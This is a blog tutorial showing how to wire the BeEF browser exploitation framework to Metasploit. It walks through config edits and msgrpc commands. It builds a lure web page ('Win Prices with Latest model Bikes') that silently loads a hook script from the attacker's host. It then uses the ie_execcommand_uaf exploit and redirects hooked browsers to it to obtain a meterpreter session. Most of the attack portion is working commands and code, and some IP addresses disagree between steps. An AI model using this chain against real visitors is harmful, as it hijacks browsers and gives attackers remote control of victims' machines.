last post we getting started with BeEF of how to insert a Javascript link in a page and compromised a client browsers.
So the Browser Exploitation Exploitation Framework (BeEF) has some awesome exploitation modules of its own, but when you combine it with the added awesome sauce that is Metasploit you get to have even more fun.
But you will have no Metasploit Framework integration by default.
Let’s fix that, by editing first the /usr/share/beef-xss/config.yaml file. You should have something like this:
Obviously, we would like to change the metasploit part (line 20 and 21) to this:
#vi /usr/share/beef-xss/config.yaml
metasploit:
enable: true
Next, we will edit the /usr/share/beef-xss/extensions/metasploit/config.yaml file and change it to this:
So you need to edit the lines host:, callback_host: (and put your IP address there) and {os: ‘custom’, path: ”} (just paste the ‘/usr/share/metasploit-framework/’ for the path)
#vi /usr/share/beef-xss/extensions/metasploit/config.yaml
host: “192.168.31.20”
pass: “bhuvi”
callback_host: “192.168.31.20”
os: ‘custom’, path: ‘/usr/share/metasploit-framework’
Now, we are ready to start msfconsole, and load the msgrpc module like this:
#/etc/init.d/postgresql restart && /etc/init.d/metasploit restart
#msf> load msgrpc ServerHost=192.168.31.10 Pass=bhuvi
And now, we can start BeEF:
#cd /usr/share/beef-xss/
#./beef
Among the BeEF start-up messages, you should see something like:
[*] Successful connection with Metasploit.
[*] Loaded 232 Metasploit exploits.
For Testing we going to create a web html page with javascript hooked.
#vi /var/www/index.html
<html>
<head>
<title> Win Prices with Latest model Bikes. </title>
<script: src=”http://192.168.31.20:3000/hook.js”></script>
</head>
<body>
<img src=”bike.jpg”/>
</body>
</html>
Downloaded bike.jpg form google and put it in /var/www directory.
Now when any client open the url http://192.168.31.20, the hook is set. Notice that the user does not have to run anything or mouse over anything for the attack to work. Just visiting the page triggers the attack.
Go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see the IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.
Now it’s time to use metasploit, after getting complete control of the victims browser use the redirect command to listen on the metasploit connection.
#msfconsole
#msf > load msgrpc ServerHost=192.168.31.10 Pass=bhuvi
#msf > use exploit/windows/browser/ie_execcommand_uaf
#msf exploit(ie_execcommand_uaf) > show options
#msf exploit(ie_execcommand_uaf) > set SRVHOST 192.168.31.20
msf exploit(ie_execcommand_uaf) > set SRVPORT 8080
#msf exploit(ie_execcommand_uaf) > set URIPATH /
#msf exploit(ie_execcommand_uaf) > exploit
Now check out the BeEF control panel. In my case it’s http://192.168.31.20:3000/ui/panel and in command section click the redirect browser and enter the mestasploit listener http://192.168.31.2:8080.
Then it will get a meterpreter session….